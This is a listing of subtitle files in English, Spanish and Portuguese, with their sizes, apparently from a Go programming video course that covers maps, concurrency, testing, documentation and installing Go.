    41 Data Structures - Map/301 Hashing Words II-en.srt 18.62 KB
    41 Data Structures - Map/300 Hashing Words-en.srt 18.61 KB
    26 Writing documentation/185 Writing documentation-es.srt 18.57 KB
    41 Data Structures - Map/300 Hashing Words-pt.srt 18.57 KB
    37 Control Flow/262 Exercise Solutions-es.srt 18.56 KB
    41 Data Structures - Map/301 Hashing Words II-pt.srt 18.53 KB
    28 Testing benchmarking/193 Benchmark examples-es.srt 18.44 KB
    04 Variables values type/021 Short declaration operator-es.srt 18.38 KB
    29 Exercises - Ninja Level 13/197 Hands-on exercise 3-en.srt 18.36 KB
    29 Exercises - Ninja Level 13/197 Hands-on exercise 3-pt.srt 18.28 KB
    28 Testing benchmarking/193 Benchmark examples-en.srt 18.25 KB
    01 Introduction/002 Why go-pt.srt 18.24 KB
    26 Writing documentation/181 Introduction-es.srt 18.24 KB
    37 Control Flow/262 Exercise Solutions-en.srt 18.24 KB
    26 Writing documentation/181 Introduction-en.srt 18.23 KB
    37 Control Flow/262 Exercise Solutions-pt.srt 18.21 KB
    01 Introduction/002 Why go-en.srt 18.18 KB
    43 Interfaces/316 Donovan Kernighan-en.srt 18.18 KB
    26 Writing documentation/181 Introduction-pt.srt 18.02 KB
    26 Writing documentation/185 Writing documentation-pt.srt 18.02 KB
    04 Variables values type/021 Short declaration operator-en.srt 18.01 KB
    33 Installing Go/211 Linux - Machine Configuration-pt.srt 18.01 KB
    18 Application/129 JSON documentation-es.srt 18.01 KB
    26 Writing documentation/185 Writing documentation-en.srt 18.01 KB
    04 Variables values type/021 Short declaration operator-pt.srt 17.99 KB
    28 Testing benchmarking/193 Benchmark examples-pt.srt 17.95 KB
    18 Application/129 JSON documentation-en.srt 17.91 KB
    42 Data Structures - Struct/305 OOP in Go-en.srt 17.82 KB
    18 Application/129 JSON documentation-pt.srt 17.76 KB
    28 Testing benchmarking/187 Introduction-es.srt 17.75 KB
    14 Functions/103 Unfurling a slice-es.srt 17.59 KB
    41 Data Structures - Map/296 Map Documentation-en.srt 17.59 KB
    14 Functions/103 Unfurling a slice-en.srt 17.52 KB
    10 Grouping data/079 Map - introduction-es.srt 17.47 KB
    28 Testing benchmarking/187 Introduction-en.srt 17.47 KB
    41 Data Structures - Map/303 Finished Hash Algorithm-pt.srt 17.47 KB
    36 Language Fundamentals/242 Closure-es.srt 17.46 KB
    41 Data Structures - Map/303 Finished Hash Algorithm-en.srt 17.4 KB
    14 Functions/103 Unfurling a slice-pt.srt 17.35 KB
    10 Grouping data/079 Map - introduction-pt.srt 17.34 KB
    43 Interfaces/322 Method Sets-es.srt 17.33 KB
    10 Grouping data/079 Map - introduction-en.srt 17.33 KB
    41 Data Structures - Map/303 Finished Hash Algorithm-es.srt 17.3 KB
    33 Installing Go/211 Linux - Machine Configuration-en.srt 17.27 KB
    28 Testing benchmarking/187 Introduction-pt.srt 17.26 KB
    20 Concurrency/145 Race condition-es.srt 17.25 KB
    36 Language Fundamentals/242 Closure-en.srt 17.22 KB
    43 Interfaces/322 Method Sets-pt.srt 17.19 KB
    16 Pointers/124 What are pointers-es.srt 17.18 KB
    01 Introduction/003 How to succeed-en.srt 17.1 KB
    01 Introduction/003 How to succeed-pt.srt 17.1 KB
    36 Language Fundamentals/242 Closure-pt.srt 17.07 KB
    01 Introduction/003 How to succeed-es.srt 17.07 KB
    20 Concurrency/143 Method sets revisited-es.srt 17.03 KB
    19 Exercises - Ninja Level 8/139 Hands-on exercise 4-es.srt 16.99 KB
    20 Concurrency/145 Race condition-pt.srt 16.94 KB
    16 Pointers/124 What are pointers-pt.srt 16.94 KB
    19 Exercises - Ninja Level 8/139 Hands-on exercise 4-en.srt 16.93 KB
    16 Pointers/124 What are pointers-en.srt 16.9 KB
    20 Concurrency/145 Race condition-en.srt 16.89 KB
    03 Your development environment/009 Shell bash commands I-es.srt 16.89 KB
    43 Interfaces/322 Method Sets-en.srt 16.86 KB
    20 Concurrency/143 Method sets revisited-pt.srt 16.82 KB
    19 Exercises - Ninja Level 8/139 Hands-on exercise 4-pt.srt 16.81 KB
    42 Data Structures - Struct/308 JSON Marshal-es.srt 16.69 KB
    03 Your development environment/009 Shell bash commands I-pt.srt 16.69 KB
    35 Computer Fundamentals/226 How Computers Work - Part I-es.srt 16.63 KB
    03 Your development environment/009 Shell bash commands I-en.srt 16.62 KB
    20 Concurrency/143 Method sets revisited-en.srt 16.62 KB
    42 Data Structures - Struct/308 JSON Marshal-pt.srt 16.43 KB
    35 Computer Fundamentals/226 How Computers Work - Part I-pt.srt 16.3 KB
    42 Data Structures - Struct/308 JSON Marshal-en.srt 16.25 KB
    42 Data Structures - Struct/306 User-Defined Types-es.srt 16.22 KB
    04 Variables values type/023 Exploring type-es.srt 16.2 KB
    03 Your development environment/014 IDEs-es.srt 16.18 KB
    42 Data Structures - Struct/306 User-Defined Types-pt.srt 16.16 KB
    18 Application/135 bcrypt-en.srt 16.16 KB
    25 Exercises - Ninja Level 11/177 Hands-on exercise 2-es.srt 16.15 KB
    18 Application/135 bcrypt-es.srt 16.12 KB
    07 Exercises - Ninja Level 2/048 Hands-on exercise 7-es.srt 16.06 KB
    03 Your development environment/014 IDEs-pt.srt 15.98 KB
    42 Data Structures - Struct/306 User-Defined Types-en.srt 15.97 KB
    04 Variables values type/023 Exploring type-pt.srt 15.94 KB
    05 Exercises - Ninja Level 1/033 Hands-on exercise 6-es.srt 15.93 KB
    25 Exercises - Ninja Level 11/177 Hands-on exercise 2-pt.srt 15.88 KB
    04 Variables values type/023 Exploring type-en.srt 15.87 KB
    42 Data Structures - Struct/307 Composition-es.srt 15.86 KB
    04 Variables values type/022 The var keyword-es.srt 15.85 KB
    07 Exercises - Ninja Level 2/048 Hands-on exercise 7-pt.srt 15.83 KB
    35 Computer Fundamentals/226 How Computers Work - Part I-en.srt 15.82 KB
    18 Application/135 bcrypt-pt.srt 15.8 KB
    25 Exercises - Ninja Level 11/177 Hands-on exercise 2-en.srt 15.76 KB
    38 Functions/282 Section Review-es.srt 15.73 KB
    21 Exercises - Ninja Level 9/150 Hands-on exercise 3-es.srt 15.73 KB
    14 Functions/110 Callback-es.srt 15.71 KB
    47 Concurrency Challenges/350 Fan Out Fan In - Solution Factorial-en.srt 15.71 KB
    29 Exercises - Ninja Level 13/195 Hands-on exercise 1-es.srt 15.7 KB
    07 Exercises - Ninja Level 2/048 Hands-on exercise 7-en.srt 15.7 KB
    03 Your development environment/014 IDEs-en.srt 15.7 KB
    36 Language Fundamentals/243 Language Spec-es.srt 15.69 KB
    43 Interfaces/323 Conversion vs Assertion-es.srt 15.67 KB
    36 Language Fundamentals/241 Scope II-es.srt 15.67 KB
    43 Interfaces/318 Sort Solution-es.srt 15.67 KB
    42 Data Structures - Struct/307 Composition-en.srt 15.65 KB
    14 Functions/110 Callback-en.srt 15.64 KB
    43 Interfaces/317 Sort Package-es.srt 15.63 KB
    03 Your development environment/016 Github repos-es.srt 15.63 KB
    04 Variables values type/022 The var keyword-en.srt 15.62 KB
    43 Interfaces/313 Interface Examples-es.srt 15.6 KB
    05 Exercises - Ninja Level 1/033 Hands-on exercise 6-pt.srt 15.6 KB
    29 Exercises - Ninja Level 13/195 Hands-on exercise 1-pt.srt 15.59 KB
    36 Language Fundamentals/241 Scope II-en.srt 15.58 KB
    43 Interfaces/318 Sort Solution-pt.srt 15.58 KB
    43 Interfaces/318 Sort Solution-en.srt 15.57 KB
    08 Control flow/052 Loop - for statement-es.srt 15.57 KB
    21 Exercises - Ninja Level 9/150 Hands-on exercise 3-pt.srt 15.55 KB
    43 Interfaces/313 Interface Examples-pt.srt 15.53 KB
    04 Variables values type/022 The var keyword-pt.srt 15.53 KB
    42 Data Structures - Struct/307 Composition-pt.srt 15.5 KB
    38 Functions/282 Section Review-pt.srt 15.5 KB
    38 Functions/282 Section Review-en.srt 15.48 KB
    36 Language Fundamentals/241 Scope II-pt.srt 15.47 KB
    21 Exercises - Ninja Level 9/149 Hands-on exercise 2-es.srt 15.46 KB
    43 Interfaces/317 Sort Package-pt.srt 15.45 KB
    21 Exercises - Ninja Level 9/150 Hands-on exercise 3-en.srt 15.44 KB
    47 Concurrency Challenges/350 Fan Out Fan In - Solution Factorial-es.srt 15.43 KB
    24 Error handling/174 Recover-es.srt 15.43 KB
    40 Data Structures - Slice/286 Slices-es.srt 15.43 KB
    14 Functions/110 Callback-pt.srt 15.42 KB
    43 Interfaces/323 Conversion vs Assertion-pt.srt 15.42 KB
    03 Your development environment/016 Github repos-pt.srt 15.37 KB
    29 Exercises - Ninja Level 13/195 Hands-on exercise 1-en.srt 15.34 KB
    43 Interfaces/313 Interface Examples-en.srt 15.32 KB
    47 Concurrency Challenges/350 Fan Out Fan In - Solution Factorial-pt.srt 15.32 KB
    14 Functions/101 Syntax-en.srt 15.31 KB
    39 Data Structures - Array/285 Array Examples-es.srt 15.3 KB
    05 Exercises - Ninja Level 1/033 Hands-on exercise 6-en.srt 15.3 KB
    21 Exercises - Ninja Level 9/149 Hands-on exercise 2-pt.srt 15.29 KB
    06 Programming fundamentals/041 Bit shifting-en.srt 15.29 KB
    33 Installing Go/208 Mac - Configuring Path Variables-pt.srt 15.28 KB
    04 Variables values type/019 Hello world-pt.srt 15.26 KB
    40 Data Structures - Slice/286 Slices-en.srt 15.26 KB
    36 Language Fundamentals/243 Language Spec-pt.srt 15.25 KB
    33 Installing Go/208 Mac - Configuring Path Variables-es.srt 15.25 KB
    14 Functions/101 Syntax-pt.srt 15.24 KB
    36 Language Fundamentals/243 Language Spec-en.srt 15.23 KB
    40 Data Structures - Slice/286 Slices-pt.srt 15.23 KB
    21 Exercises - Ninja Level 9/149 Hands-on exercise 2-en.srt 15.22 KB
    43 Interfaces/317 Sort Package-en.srt 15.19 KB
    43 Interfaces/323 Conversion vs Assertion-en.srt 15.18 KB
    39 Data Structures - Array/285 Array Examples-en.srt 15.18 KB
    08 Control flow/052 Loop - for statement-en.srt 15.17 KB
    14 Functions/101 Syntax-es.srt 15.16 KB
    32 Introduction/201 Hello World-es.srt 15.16 KB
    03 Your development environment/016 Github repos-en.srt 15.15 KB
    06 Programming fundamentals/041 Bit shifting-es.srt 15.11 KB
    04 Variables values type/019 Hello world-en.srt 15.07 KB
    04 Variables values type/019 Hello world-es.srt 15.05 KB
    37 Control Flow/259 String Type-en.srt 15.01 KB
    08 Control flow/052 Loop - for statement-pt.srt 14.99 KB
    39 Data Structures - Array/285 Array Examples-pt.srt 14.96 KB
    33 Installing Go/208 Mac - Configuring Path Variables-en.srt 14.94 KB
    32 Introduction/201 Hello World-en.srt 14.94 KB
    06 Programming fundamentals/041 Bit shifting-pt.srt 14.92 KB
    32 Introduction/201 Hello World-pt.srt 14.9 KB
    24 Error handling/174 Recover-pt.srt 14.84 KB
    34 Your Development Environment/219 Creating Your First Project-es.srt 14.8 KB
    36 Language Fundamentals/245 Constants-en.srt 14.71 KB
    14 Functions/109 Returning a func-en.srt 14.71 KB
    15 Exercises - Ninja Level 6/113 Hands-on exercise 1-es.srt 14.69 KB
    14 Functions/109 Returning a func-es.srt 14.65 KB
    36 Language Fundamentals/245 Constants-es.srt 14.64 KB
    35 Computer Fundamentals/228 Github Update Command-es.srt 14.58 KB
    35 Computer Fundamentals/228 Github Update Command-pt.srt 14.57 KB
    45 Channels/330 Channels - Introduction-en.srt 14.57 KB
    44 Concurrency/329 Review Channels Preview-es.srt 14.56 KB
    45 Channels/330 Channels - Introduction-es.srt 14.52 KB
    36 Language Fundamentals/245 Constants-pt.srt 14.52 KB
    14 Functions/109 Returning a func-pt.srt 14.51 KB
    35 Computer Fundamentals/235 Section Review-es.srt 14.51 KB
    24 Error handling/174 Recover-en.srt 14.51 KB
    35 Computer Fundamentals/228 Github Update Command-en.srt 14.48 KB
    34 Your Development Environment/219 Creating Your First Project-pt.srt 14.48 KB
    44 Concurrency/329 Review Channels Preview-en.srt 14.44 KB
    45 Channels/330 Channels - Introduction-pt.srt 14.39 KB
    44 Concurrency/329 Review Channels Preview-pt.srt 14.36 KB
    41 Data Structures - Map/302 Build A Hash Table-en.srt 14.35 KB
    40 Data Structures - Slice/287 Slice Examples-pt.srt 14.34 KB
    15 Exercises - Ninja Level 6/113 Hands-on exercise 1-pt.srt 14.34 KB
    03 Your development environment/011 Installing Go-es.srt 14.3 KB
    15 Exercises - Ninja Level 6/113 Hands-on exercise 1-en.srt 14.28 KB
    34 Your Development Environment/216 Go Editors-es.srt 14.27 KB
    34 Your Development Environment/219 Creating Your First Project-en.srt 14.23 KB
    40 Data Structures - Slice/287 Slice Examples-en.srt 14.21 KB
    40 Data Structures - Slice/287 Slice Examples-es.srt 14.21 KB
    41 Data Structures - Map/302 Build A Hash Table-es.srt 14.2 KB
    35 Computer Fundamentals/235 Section Review-pt.srt 14.17 KB
    34 Your Development Environment/216 Go Editors-pt.srt 14.14 KB
    34 Your Development Environment/216 Go Editors-en.srt 14.13 KB
    41 Data Structures - Map/302 Build A Hash Table-pt.srt 14.11 KB
    03 Your development environment/011 Installing Go-pt.srt 14.11 KB
    43 Interfaces/315 Bill Kennedy-es.srt 14.07 KB
    28 Testing benchmarking/194 Review-es.srt 14.07 KB
    25 Exercises - Ninja Level 11/178 Hands-on exercise 3-es.srt 13.98 KB
    03 Your development environment/011 Installing Go-en.srt 13.94 KB
    26 Writing documentation/182 go doc-es.srt 13.94 KB
    10 Grouping data/077 Slice - make-es.srt 13.94 KB
    25 Exercises - Ninja Level 11/178 Hands-on exercise 3-pt.srt 13.93 KB
    35 Computer Fundamentals/232 Text Encoding-es.srt 13.92 KB
    10 Grouping data/077 Slice - make-pt.srt 13.89 KB
    35 Computer Fundamentals/232 Text Encoding-en.srt 13.88 KB
    25 Exercises - Ninja Level 11/178 Hands-on exercise 3-en.srt 13.88 KB
    35 Computer Fundamentals/235 Section Review-en.srt 13.84 KB
    35 Computer Fundamentals/234 Format Printing-es.srt 13.82 KB
    35 Computer Fundamentals/233 Coding Scheme Programs-es.srt 13.79 KB
    35 Computer Fundamentals/233 Coding Scheme Programs-pt.srt 13.78 KB
    28 Testing benchmarking/192 Coverage-es.srt 13.77 KB
    26 Writing documentation/182 go doc-en.srt 13.74 KB
    28 Testing benchmarking/194 Review-pt.srt 13.74 KB
    35 Computer Fundamentals/232 Text Encoding-pt.srt 13.71 KB
    26 Writing documentation/182 go doc-pt.srt 13.68 KB
    43 Interfaces/315 Bill Kennedy-pt.srt 13.67 KB
    10 Grouping data/077 Slice - make-en.srt 13.66 KB
    33 Installing Go/205 Go Workspace-es.srt 13.65 KB
    28 Testing benchmarking/194 Review-en.srt 13.65 KB
    37 Control Flow/263 Section Review-es.srt 13.62 KB
    35 Computer Fundamentals/233 Coding Scheme Programs-en.srt 13.62 KB
    41 Data Structures - Map/294 Map Examples - Part II-es.srt 13.62 KB
    35 Computer Fundamentals/234 Format Printing-en.srt 13.61 KB
    41 Data Structures - Map/294 Map Examples - Part II-pt.srt 13.6 KB
    34 Your Development Environment/220 Hello World with Webstorm-pt.srt 13.57 KB
    33 Installing Go/205 Go Workspace-pt.srt 13.56 KB
    34 Your Development Environment/220 Hello World with Webstorm-es.srt 13.56 KB
    03 Your development environment/013 Environment variables-es.srt 13.55 KB
    35 Computer Fundamentals/234 Format Printing-pt.srt 13.52 KB
    37 Control Flow/263 Section Review-en.srt 13.47 KB
    03 Your development environment/013 Environment variables-pt.srt 13.46 KB
    34 Your Development Environment/220 Hello World with Webstorm-en.srt 13.42 KB
    41 Data Structures - Map/294 Map Examples - Part II-en.srt 13.39 KB
    24 Error handling/173 Printing and logging-es.srt 13.39 KB
    03 Your development environment/013 Environment variables-en.srt 13.37 KB
    22 Channels/156 Directional channels-es.srt 13.31 KB
    22 Channels/156 Directional channels-en.srt 13.31 KB
    28 Testing benchmarking/192 Coverage-pt.srt 13.3 KB
    33 Installing Go/205 Go Workspace-en.srt 13.29 KB
    18 Application/134 Sort custom-es.srt 13.29 KB
    37 Control Flow/263 Section Review-pt.srt 13.26 KB
    47 Concurrency Challenges/348 Fan Out Fan In - Solution-en.srt 13.26 KB
    18 Application/134 Sort custom-pt.srt 13.17 KB
    22 Channels/156 Directional channels-pt.srt 13.12 KB
    47 Concurrency Challenges/348 Fan Out Fan In - Solution-pt.srt 13.11 KB
    47 Concurrency Challenges/348 Fan Out Fan In - Solution-es.srt 13.1 KB
    28 Testing benchmarking/192 Coverage-en.srt 13.1 KB
    43 Interfaces/315 Bill Kennedy-en.srt 13.08 KB
    24 Error handling/173 Printing and logging-pt.srt 13.02 KB
    33 Installing Go/207 Windows - Configuring Path Variables-pt.srt 13.01 KB
    33 Installing Go/207 Windows - Configuring Path Variables-es.srt 12.96 KB
    28 Testing benchmarking/189 Example tests-es.srt 12.94 KB
    28 Testing benchmarking/191 Benchmark-es.srt 12.91 KB
    36 Language Fundamentals/239 Variables-es.srt 12.86 KB
    24 Error handling/173 Printing and logging-en.srt 12.84 KB
    16 Pointers/125 When to use pointers-es.srt 12.83 KB
    45 Channels/333 Semaphores - Part 1-es.srt 12.82 KB
    18 Application/134 Sort custom-en.srt 12.75 KB
    36 Language Fundamentals/239 Variables-en.srt 12.74 KB
    36 Language Fundamentals/239 Variables-pt.srt 12.7 KB
    16 Pointers/125 When to use pointers-pt.srt 12.7 KB
    16 Pointers/125 When to use pointers-en.srt 12.69 KB
    28 Testing benchmarking/189 Example tests-en.srt 12.67 KB
    36 Language Fundamentals/250 Using Pointers-es.srt 12.64 KB
    33 Installing Go/207 Windows - Configuring Path Variables-en.srt 12.63 KB
    41 Data Structures - Map/293 Map Examples - Part I-es.srt 12.63 KB
    45 Channels/333 Semaphores - Part 1-en.srt 12.62 KB
    28 Testing benchmarking/189 Example tests-pt.srt 12.61 KB
    45 Channels/333 Semaphores - Part 1-pt.srt 12.61 KB
    04 Variables values type/025 The fmt package-pt.srt 12.57 KB
    04 Variables values type/025 The fmt package-es.srt 12.56 KB
    36 Language Fundamentals/250 Using Pointers-pt.srt 12.55 KB
    22 Channels/159 Select-en.srt 12.5 KB
    36 Language Fundamentals/237 Packages-es.srt 12.5 KB
    04 Variables values type/025 The fmt package-en.srt 12.5 KB
    06 Programming fundamentals/034 Bool type-es.srt 12.5 KB
    41 Data Structures - Map/293 Map Examples - Part I-pt.srt 12.49 KB
    28 Testing benchmarking/191 Benchmark-pt.srt 12.48 KB
    43 Interfaces/321 Empty Interface-en.srt 12.48 KB
    28 Testing benchmarking/191 Benchmark-en.srt 12.48 KB
    43 Interfaces/321 Empty Interface-es.srt 12.46 KB
    36 Language Fundamentals/250 Using Pointers-en.srt 12.44 KB
    34 Your Development Environment/222 Understanding Github-pt.srt 12.44 KB
    06 Programming fundamentals/034 Bool type-en.srt 12.44 KB
    34 Your Development Environment/222 Understanding Github-es.srt 12.4 KB
    41 Data Structures - Map/293 Map Examples - Part I-en.srt 12.36 KB
    43 Interfaces/321 Empty Interface-pt.srt 12.32 KB
    06 Programming fundamentals/034 Bool type-pt.srt 12.29 KB
    34 Your Development Environment/222 Understanding Github-en.srt 12.28 KB
    22 Channels/159 Select-es.srt 12.27 KB
    22 Channels/159 Select-pt.srt 12.27 KB
    36 Language Fundamentals/240 Scope-es.srt 12.23 KB
    38 Functions/281 Exercises - Part III-en.srt 12.23 KB
    46 Applied Concurrency/339 Deadlock Challenge-es.srt 12.2 KB
    14 Functions/112 Recursion-es.srt 12.19 KB
    36 Language Fundamentals/237 Packages-en.srt 12.17 KB
    38 Functions/281 Exercises - Part III-pt.srt 12.13 KB
    36 Language Fundamentals/237 Packages-pt.srt 12.12 KB
    39 Data Structures - Array/284 Array-es.srt 12.12 KB
    38 Functions/281 Exercises - Part III-es.srt 12.07 KB
    46 Applied Concurrency/339 Deadlock Challenge-en.srt 12.05 KB
    14 Functions/112 Recursion-en.srt 12.04 KB
    33 Installing Go/204 Installation Insights-en.srt 12.04 KB
    46 Applied Concurrency/339 Deadlock Challenge-pt.srt 12 KB
    33 Installing Go/204 Installation Insights-es.srt 12 KB
    39 Data Structures - Array/284 Array-pt.srt 12 KB
    08 Control flow/059 Conditional - switch statement documentation-es.srt 11.99 KB
    33 Installing Go/204 Installation Insights-pt.srt 11.98 KB
    38 Functions/265 Intro To Functions-en.srt 11.96 KB
    49 Error Handling/359 Handling Errors Logging Errors to a File-es.srt 11.95 KB
    36 Language Fundamentals/240 Scope-pt.srt 11.88 KB
    36 Language Fundamentals/240 Scope-en.srt 11.88 KB
    38 Functions/265 Intro To Functions-es.srt 11.87 KB
    39 Data Structures - Array/284 Array-en.srt 11.86 KB
    01 Introduction/001 Valuable Resources-en.srt 11.83 KB
    14 Functions/112 Recursion-pt.srt 11.75 KB
    14 Functions/111 Closure-es.srt 11.74 KB
    15 Exercises - Ninja Level 6/117 Hands-on exercise 5-es.srt 11.73 KB
    38 Functions/278 Bool Expressions-es.srt 11.72 KB
    01 Introduction/001 Valuable Resources-es.srt 11.7 KB
    37 Control Flow/260 Switch Statements-en.srt 11.69 KB
    11 Exercises - Ninja Level 4/088 Hands-on exercise 7-es.srt 11.68 KB
    38 Functions/265 Intro To Functions-pt.srt 11.68 KB
    14 Functions/111 Closure-en.srt 11.67 KB
    15 Exercises - Ninja Level 6/117 Hands-on exercise 5-pt.srt 11.67 KB
    22 Channels/161 Fan in-en.srt 11.64 KB
    14 Functions/102 Variadic parameter-es.srt 11.64 KB
    49 Error Handling/359 Handling Errors Logging Errors to a File-pt.srt 11.64 KB
    11 Exercises - Ninja Level 4/088 Hands-on exercise 7-en.srt 11.62 KB
    35 Computer Fundamentals/230 Binary Numbering System-es.srt 11.61 KB
    37 Control Flow/260 Switch Statements-es.srt 11.61 KB
    11 Exercises - Ninja Level 4/088 Hands-on exercise 7-pt.srt 11.59 KB
    14 Functions/111 Closure-pt.srt 11.58 KB
    01 Introduction/001 Valuable Resources-pt.srt 11.57 KB
    38 Functions/278 Bool Expressions-en.srt 11.54 KB
    08 Control flow/059 Conditional - switch statement documentation-en.srt 11.53 KB
    14 Functions/102 Variadic parameter-en.srt 11.51 KB
    14 Functions/102 Variadic parameter-pt.srt 11.51 KB
    19 Exercises - Ninja Level 8/140 Hands-on exercise 5-pt.srt 11.51 KB
    19 Exercises - Ninja Level 8/140 Hands-on exercise 5-es.srt 11.49 KB
    08 Control flow/059 Conditional - switch statement documentation-pt.srt 11.49 KB
    50 Farewell/367 Next Steps-pt.srt 11.48 KB
    35 Computer Fundamentals/230 Binary Numbering System-en.srt 11.47 KB
    12 Structs/094 Reading documentation-es.srt 11.46 KB
    22 Channels/161 Fan in-es.srt 11.46 KB
    15 Exercises - Ninja Level 6/117 Hands-on exercise 5-en.srt 11.45 KB
    19 Exercises - Ninja Level 8/140 Hands-on exercise 5-en.srt 11.45 KB
    50 Farewell/367 Next Steps-es.srt 11.43 KB
    50 Farewell/367 Next Steps-en.srt 11.4 KB
    38 Functions/278 Bool Expressions-pt.srt 11.39 KB
    37 Control Flow/260 Switch Statements-pt.srt 11.38 KB
    03 Your development environment/017 Github explored-es.srt 11.38 KB
    46 Applied Concurrency/345 Fan In Pattern-en.srt 11.37 KB
    03 Your development environment/017 Github explored-en.srt 11.35 KB
    37 Control Flow/253 Section Overview-es.srt 11.33 KB
    23 Exercises - Ninja Level 10/170 Hands-on exercise 7-en.srt 11.31 KB
    35 Computer Fundamentals/230 Binary Numbering System-pt.srt 11.31 KB
    49 Error Handling/359 Handling Errors Logging Errors to a File-en.srt 11.31 KB
    03 Your development environment/017 Github explored-pt.srt 11.3 KB
    42 Data Structures - Struct/310 JSON Encode-pt.srt 11.27 KB
    42 Data Structures - Struct/310 JSON Encode-es.srt 11.26 KB
    22 Channels/161 Fan in-pt.srt 11.21 KB
    02 Course Overview/004 Course resources-en.srt 11.2 KB
    23 Exercises - Ninja Level 10/170 Hands-on exercise 7-pt.srt 11.19 KB
    12 Structs/094 Reading documentation-en.srt 11.18 KB
    37 Control Flow/253 Section Overview-pt.srt 11.18 KB
    12 Structs/094 Reading documentation-pt.srt 11.18 KB
    23 Exercises - Ninja Level 10/170 Hands-on exercise 7-es.srt 11.17 KB
    37 Control Flow/253 Section Overview-en.srt 11.17 KB
    02 Course Overview/004 Course resources-es.srt 11.15 KB
    46 Applied Concurrency/345 Fan In Pattern-es.srt 11.14 KB
    02 Course Overview/004 Course resources-pt.srt 11.02 KB
    37 Control Flow/254 For Loop-es.srt 11 KB
    42 Data Structures - Struct/310 JSON Encode-en.srt 10.99 KB
    46 Applied Concurrency/345 Fan In Pattern-pt.srt 10.96 KB
    33 Installing Go/206 Environment Variables-pt.srt 10.93 KB
    37 Control Flow/256 Conditions Break Continue-en.srt 10.91 KB
    37 Control Flow/256 Conditions Break Continue-es.srt 10.87 KB
    36 Language Fundamentals/246 Constants II-en.srt 10.84 KB
    08 Control flow/058 Conditional - switch statement-es.srt 10.84 KB
    37 Control Flow/254 For Loop-en.srt 10.8 KB
    37 Control Flow/256 Conditions Break Continue-pt.srt 10.78 KB
    37 Control Flow/254 For Loop-pt.srt 10.67 KB
    45 Channels/336 Channels as Arguments Returns-en.srt 10.66 KB
    33 Installing Go/206 Environment Variables-es.srt 10.66 KB
    03 Your development environment/008 Bash on windows-es.srt 10.63 KB
    45 Channels/336 Channels as Arguments Returns-es.srt 10.62 KB
    38 Functions/275 Pass By Value-es.srt 10.62 KB
    08 Control flow/055 Conditional - if statement-es.srt 10.61 KB
    33 Installing Go/206 Environment Variables-en.srt 10.59 KB
    08 Control flow/058 Conditional - switch statement-en.srt 10.57 KB
    38 Functions/275 Pass By Value-en.srt 10.57 KB
    37 Control Flow/261 If Statements-es.srt 10.55 KB
    41 Data Structures - Map/292 Maps Introduction-es.srt 10.52 KB
    45 Channels/336 Channels as Arguments Returns-pt.srt 10.51 KB
    28 Testing benchmarking/188 Table tests-es.srt 10.51 KB
    38 Functions/275 Pass By Value-pt.srt 10.5 KB
    08 Control flow/055 Conditional - if statement-en.srt 10.47 KB
    34 Your Development Environment/217 WebStorm Atom.io-es.srt 10.45 KB
    08 Control flow/058 Conditional - switch statement-pt.srt 10.44 KB
    36 Language Fundamentals/248 Memory Addresses-es.srt 10.42 KB
    38 Functions/279 Exercises - Part I-en.srt 10.42 KB
    40 Data Structures - Slice/288 More Slice Examples-es.srt 10.42 KB
    08 Control flow/055 Conditional - if statement-pt.srt 10.4 KB
    38 Functions/279 Exercises - Part I-es.srt 10.36 KB
    40 Data Structures - Slice/288 More Slice Examples-en.srt 10.34 KB
    28 Testing benchmarking/188 Table tests-pt.srt 10.33 KB
    26 Writing documentation/183 godoc-en.srt 10.31 KB
    03 Your development environment/008 Bash on windows-pt.srt 10.3 KB
    28 Testing benchmarking/188 Table tests-en.srt 10.3 KB
    37 Control Flow/261 If Statements-pt.srt 10.29 KB
    36 Language Fundamentals/248 Memory Addresses-en.srt 10.29 KB
    46 Applied Concurrency/341 Pipeline Pattern-es.srt 10.29 KB
    46 Applied Concurrency/341 Pipeline Pattern-en.srt 10.29 KB
    36 Language Fundamentals/248 Memory Addresses-pt.srt 10.29 KB
    40 Data Structures - Slice/288 More Slice Examples-pt.srt 10.29 KB
    24 Error handling/172 Checking errors-pt.srt 10.26 KB
    26 Writing documentation/183 godoc-es.srt 10.26 KB
    03 Your development environment/008 Bash on windows-en.srt 10.26 KB
    49 Error Handling/364 Providing Even More Context with Errors-es.srt 10.25 KB
    24 Error handling/172 Checking errors-es.srt 10.23 KB
    24 Error handling/172 Checking errors-en.srt 10.23 KB
    34 Your Development Environment/217 WebStorm Atom.io-en.srt 10.23 KB
    41 Data Structures - Map/292 Maps Introduction-pt.srt 10.21 KB
    41 Data Structures - Map/292 Maps Introduction-en.srt 10.21 KB
    37 Control Flow/261 If Statements-en.srt 10.2 KB
    03 Your development environment/010 Shell bash commands II-pt.srt 10.16 KB
    37 Control Flow/255 Nested Loops-es.srt 10.16 KB
    34 Your Development Environment/217 WebStorm Atom.io-pt.srt 10.15 KB
    49 Error Handling/364 Providing Even More Context with Errors-en.srt 10.14 KB
    03 Your development environment/010 Shell bash commands II-es.srt 10.12 KB
    38 Functions/279 Exercises - Part I-pt.srt 10.12 KB
    49 Error Handling/364 Providing Even More Context with Errors-pt.srt 10.08 KB
    26 Writing documentation/183 godoc-pt.srt 10.08 KB
    46 Applied Concurrency/341 Pipeline Pattern-pt.srt 10.05 KB
    36 Language Fundamentals/249 Pointers-es.srt 10.03 KB
    37 Control Flow/255 Nested Loops-en.srt 10 KB
    03 Your development environment/010 Shell bash commands II-en.srt 9.97 KB
    35 Computer Fundamentals/231 Hexadecimal Numbering System-es.srt 9.96 KB
    38 Functions/271 Callbacks-es.srt 9.93 KB
    02 Course Overview/005 Documentation-en.srt 9.92 KB
    38 Functions/267 Variadic Functions-en.srt 9.91 KB
    37 Control Flow/255 Nested Loops-pt.srt 9.9 KB
    03 Your development environment/007 The terminal-es.srt 9.89 KB
    02 Course Overview/005 Documentation-es.srt 9.88 KB
    38 Functions/267 Variadic Functions-es.srt 9.88 KB
    35 Computer Fundamentals/231 Hexadecimal Numbering System-pt.srt 9.85 KB
    04 Variables values type/018 Playground-es.srt 9.84 KB
    38 Functions/271 Callbacks-en.srt 9.79 KB
    04 Variables values type/018 Playground-en.srt 9.78 KB
    36 Language Fundamentals/249 Pointers-en.srt 9.77 KB
    03 Your development environment/007 The terminal-en.srt 9.77 KB
    36 Language Fundamentals/249 Pointers-pt.srt 9.77 KB
    35 Computer Fundamentals/231 Hexadecimal Numbering System-en.srt 9.77 KB
    04 Variables values type/018 Playground-pt.srt 9.76 KB
    38 Functions/271 Callbacks-pt.srt 9.75 KB
    38 Functions/267 Variadic Functions-pt.srt 9.75 KB
    49 Error Handling/361 Custom Errors - Creating Values of Type error-es.srt 9.74 KB
